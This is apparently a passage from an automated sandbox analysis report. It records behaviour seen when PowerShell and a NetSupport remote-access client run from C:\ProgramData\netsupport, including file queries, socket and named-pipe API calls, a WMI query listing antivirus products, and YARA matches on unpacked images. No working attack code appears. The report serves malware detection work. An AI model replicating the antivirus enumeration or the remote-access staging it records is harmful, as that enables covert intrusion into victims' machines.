                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ScheduledJob\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ScheduledJob.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\netsupport VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\ProgramData\netsupport\client\client32.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\ProgramData\netsupport\client\client32.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\WSJ_4.12.77.0_x64__v3spfewvfazpe{cc5f9d8b-94e7-4e6d-8d7d-70b7a8e2a015}_temp.pri VolumeInformation
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110F1070 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,32_2_110F1070
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1101D160 __time64,SetRect,GetLocalTime,32_2_1101D160
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1103B170 _calloc,GetUserNameA,_free,_calloc,_free,32_2_1103B170
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11171199 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,32_2_11171199
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1109D240 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,32_2_1109D240
                                    Source: powershell.exe, 0000001A.00000002.2194762703.0000023179892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1106F200 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,32_2_1106F200
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110D5D90 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,32_2_110D5D90
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEBA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,32_2_6BEBA980
                                    Source: Yara matchFile source: 32.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 32.2.client32.exe.6c1b0000.4.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 32.2.client32.exe.74670000.5.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 26.2.powershell.exe.23162f37328.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 26.2.powershell.exe.23162f2d0d8.4.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 26.2.powershell.exe.2316336ecf8.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 32.2.client32.exe.111b32a0.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 32.2.client32.exe.6beb0000.2.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 32.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2526275885.000000000270C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2542110346.0000000005AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2526275885.0000000002700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2540155172.0000000005A6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
